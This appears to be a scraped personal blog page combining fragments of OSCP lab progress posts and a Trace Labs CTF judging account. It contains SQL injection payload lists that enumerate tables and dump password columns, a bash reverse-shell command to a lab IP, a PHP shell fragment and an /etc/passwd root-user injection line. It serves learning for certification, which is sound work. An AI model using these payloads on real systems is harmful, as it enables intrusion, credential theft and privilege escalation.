Dev and Security Walkthroughs

Opening 5 more down. MAIL, Pedro, and Chris were harder. Peter and Kraken took a few minutes to solve. Favorites My top three were MAIL, Pedro, and Chris. MAIL This was a hard box. I believe it took me 3 days. Pedro The best part about this box was the thought process behind it. It took me a few hours sending different things at it. This type of thinking could be applied to offices and companies. When I got it I thought 'oh. Thats pretty clever.' Chris This box isn't that hard. My enumeration was terrible. I made notes on what I did wrong. My mistakes and learning from them help on future boxes. This box broke my enumeration tool. Checkpoint This was the first time I used one box to get at another. I call it bungee-gum. When you use one target to get at another. I'll try to do more complex bungee-gum techniques. I'm also 5 away from 20. I've seen people with a total of 20 pass the OSCP. I'm way too invested to stop at 20. I want to

' OR 1=1-- SELECT First_Name FROM Author WHERE Name = '' ' ORDER BY 3-- ' UNION SELECT owner, table_name, id FROM dba_tables-- ' UNION SELECT owner, table_name, null FROM all_tables-- ' UNION SELECT user, password, null FROM WEB_ADMINS-- ' UNION SELECT user, password, null FROM WEB_USERS-- ' UNION SELECT COLUMN_NAME, null, null FROM ALL_TAB_COLUMNS where TABLE_NAME='WEB_ADMINS'-- ' UNION SELECT COLUMN_NAME, null, null FROM ALL_TAB_COLUMNS where TABLE_NAME='WEB_USERS'-- ' UNION SELECT COLUMN_NAME, null, null FROM ALL_TAB_COLUMNS where TABLE_NAME='USER_PRIVILEGE_MAP'-- ' UNION SELECT COLUMN_NAME, version(), null FROM ALL_TAB_COLUMNS where TABLE_NAME='WEB_USERS'-- ' UNION SELECT PASSWORD, ADMIN_NAME, ADMIN_ID FROM WEB_ADMINS-- ' UNION SELECT PASSWORD, USER_NAME, USER_ID FROM WEB_USERS-- ' UNION SELECT NAME, null, null FROM USER_PRIVILEGE_MAP--

Opening I applied to be a Trace Labs Judge for the SANS Student and Alumni event. I'm not a past or present SANS student, so the only avenue to participate was judging. I was interested in judging to see what it was like. For the SANS event I was given 1 team. They weren't active the entire time. I multi-tasked during the event. I cleaned my house, hacked away at my OSCP labs, and checked the submissions every 20 minutes. Coming into the Global September CTF I thought it would be a bit more busy, but I could still clean and hack away. Oh boy, was I wrong. At the worst I had 30 different submissions in the queue. I was given two teams. One of the teams I recognized. I'm glad I got them because I knew they would keep me busy. They are one of those teams that keeps fighting until the last minute. My 2nd team I didn't recongize, but they also submitted every hour until the last minute. The first and second hour were intense. Mid-day (hours 3-4) were the worst.

Note: Hashes partially hidden and times off. Opening Here is five more! I unlocked the IT Department network too. I picked 5 Window boxes since its a weakness of mine. After hacking 5 of them, I feel a bit more comfortable. Current Concerns Pivoting Lateral Movement Windows Privilege Escalation Active Directory Attacks Buffer Overflows I'm watching TCM's Windows Priv Escalation Course: TCM Course . I'll finish it on Saturday, depending on how busy I am as a judge. I learned what VNC is. Don't discount the mount command when samba is acting up. I did some MS-SQL injection. My favorite box was DISCO and DJ. My least favorite was Jerry (just cause it took me 10 minutes to solve). Attacking Next The internal IT Department is on my mind. I also notice a domain controller. Music

' ORDER BY 2-- ' UNION SELECT NULL, NULL-- ' UNION SELECT 'amanda', NULL-- ' UNION SELECT @@version, NULL-- ' UNION SELECT DB_NAME(1), NULL-- (master, tempdb, model, msdb, music,) ' UNION SELECT name, NULL FROM master ..sysdatabases-- (WHYYY) ^- displays all tables ' UNION SELECT TABLE_NAME,NULL FROM information_schema.TABLES-- (albums, concerts, singles, songs, users) ' UNION SELECT column_name,NULL FROM information_schema.COLUMNS-- (artist, id, name, pass, place, year) ' UNION SELECT name,NULL FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'users')-- (id, name, pass) ' UNION SELECT name,NULL FROM users-- (alice, brett, eric, peter) ' UNION SELECT pass,NULL FROM users-- 123pass123 34819d7beeabb9260a5c854bc85b3e99 5f4dcc3b5aa765d61d8327deb882cf99 7d9264f1c1c042b799ef08da95a782d4 CREATE LOGIN amanda WITH PASSWORD = 'password' ' UNION select name, NULL from sys.server_principals-- D

Note: Hashes partially covered. Just in case they mean something. Time is in GMT. Opening I'm back at it again. I decided to sign up for the OSCP PWK instead of doing 40 HtB challenges. I wouldn't meet my December 2020 timeline with that strategy. I do better with a defined timeline. I signed up for 60 days insead of 90. I'm in jeporady of running out of lab time before I solve all the boxes. It takes me 1-3 days for one box right now. Four of the boxes I hacked are Linux-based. I've turned my attention to Window boxes which is a huge weakness of mine. I feel like I'm gonna need 40-50 hours of practice to solve an easy-medium Windows box in a reasonable amount of time. Current Concerns Windows Too many ports and services on one target Shellcode Hex Characters Buffer Overflow Being Slow Note Taking 1. Windows - Need more practice 2. Need more practice. I like boxes with less ports open. I'm less likely to go down a wrong path

SHELLS Bash Bash Small Shell /Lab/Mailman$ ./exploit.py 10.11.1.231 "bash -i >& /dev/tcp/192.168.119.184/9999 0>&1" PHP PHP Small Shell $sock, 1=>$sock, 2=>$sock), $pipes); ?> Linux Privilege Escalation Add to Password File openssl passwd evil echo "vickie:q26boqdSkSLpg:0:0:root:/root:/bin/bash" >> /etc/passwd Linux Github Files https://github.com/Anon-Exploiter/SUID3NUM GCC gcc -Wall -m32 -Wl,--hash-style=both 9542.c -o 9542 Walkthroughs TJNulls __ Fan Favorites https://www.exploit-db.com/exploits/44298 (